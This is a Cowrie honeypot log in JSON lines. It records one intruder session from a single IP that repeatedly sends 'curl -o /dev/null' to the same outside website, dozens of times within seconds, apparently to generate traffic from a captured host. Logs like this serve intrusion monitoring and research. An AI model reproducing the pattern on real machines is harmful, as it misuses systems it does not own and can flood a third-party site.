{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.581715Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.630247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.631281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.675152Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.676151Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.723175Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.725594Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.762632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.763685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.800416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.802047Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.838842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.839733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.876573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.877462Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.916414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.917601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.955936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.956817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:16.993351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:16.994309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.031540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.032427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.070053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.070771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.117883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.118954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.157909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.158844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.204079Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.204966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.244733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.245628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.290772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.291697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.337487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.338464Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.377316Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.378494Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.421633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.422493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.459083Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.459944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.500881Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.502037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.549092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.549986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.588111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.589070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.632794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.633697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.679704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.680581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.716889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.717815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.778078Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.779085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.821548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.822454Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.869234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.870376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.920542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.921474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:17.969674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:17.970630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.030227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.031496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.068631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.069504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.106199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.107095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.144558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.145514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.183122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.184029Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.220817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.221756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.261813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.262773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.301375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.302280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.343311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.344226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.385940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.386869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.440536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.441548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.478786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.480154Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.517479Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.518450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.555660Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.556545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.593769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.594984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.634426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.635416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.672019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.673082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.709849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.710806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.747583Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.748649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.785344Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.786515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.835482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.836468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.874922Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.876019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.912653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.913939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.950544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.951371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:18.991676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:18.992673Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.030393Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.031599Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.074929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.076016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.113053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.113981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.150830Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.151842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.189264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.189971Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.249985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.251112Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.296420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:19.297514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:19.334817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
